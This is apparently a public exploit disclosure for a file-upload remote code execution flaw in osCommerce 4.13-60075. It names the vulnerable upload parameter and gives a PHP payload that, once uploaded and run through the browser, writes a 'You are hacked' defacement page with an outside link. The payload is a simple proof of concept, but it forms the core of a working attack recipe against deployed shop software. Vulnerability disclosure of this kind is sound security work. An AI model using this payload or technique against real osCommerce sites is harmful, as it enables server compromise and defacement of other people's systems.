## Title: osCommerce 4.13-60075 File-Upload-RCE ## Author: nu11secur1ty ## Date: 12/14/2023 ## Vendor: https://www.oscommerce.com/ ## Software: https://www.oscommerce.com/download-file ## Reference: https://portswigger.net/web-security/file-upload ## Description: The parameter "icon-pencil" in the upload-file dz-clickable function is vulnerable for File upload and Remote Code Execution then! The attacker easily can destroy this system if he is a kracker, grey hat, or some kind of stupid kid. More: {https://portswigger.net/web-security/file-upload}. In this scenario, I just uploaded a PHP exploit which created a second file directly on the server and then I executed it DIRECTLY on the server, by using just a browser. This can be executed with more methods but we can talk about it later. =) STATUS: CRITICAL Vulnerability [+]Exploit: ``` <?php // @nu11secur1ty 2023 $myfile = fopen("hacked.html", "w") or die("Unable to open file!"); $txt = "<p>You are hacked</p>\n"; fwrite($myfile, $txt); $txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>You can visit our website for more information!</a></p>\n"; fwrite($myfile, $txt); fclose($myfile); ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oscommerce.com/osCommerce-4.13-60075) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/oscommerce-413-60075-file-upload-rce.html) ## Time spent: 00:15:00